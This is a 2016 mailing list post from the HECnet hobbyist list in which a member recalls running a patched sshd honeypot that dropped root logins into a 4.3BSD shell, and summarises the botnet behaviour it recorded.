[HECnet] Botnet hits on 23/tcp
Jacob Goense
dugo at xs4all.nl
Tue Oct 25 12:28:09 PDT 2016
On 2016-10-25 12:46, Johnny Billquist wrote:
> But it's hilarious to watch from RSX, how the script-kiddies try and
> try...
For a while I had a patched up sshd running. I have the ssh
config/patches
still documented at http://www.eunet.it/tac8.html but never got around
to
writing up the rest. tldr; a root logon with any password seamlessly
drop you
into a 4.3BSD root shell. I thought hilarity would ensue.
A few observations.
Back then it was mostly China.
Some of the more clever botnets would start their brute force password
attempts with a long random password, probably to detect exactly what
I was doing, running a honeypot.
A large number of attempts to wget/curl a rootkit once in. Probably
scripted or copy/paste, but the lack of any follow up commands was
telling.
I had it up for about a year and nobody ever ruined the box. Actually,
only 2 people ever interactively explored the system.
More information about the Hecnet-list
mailing list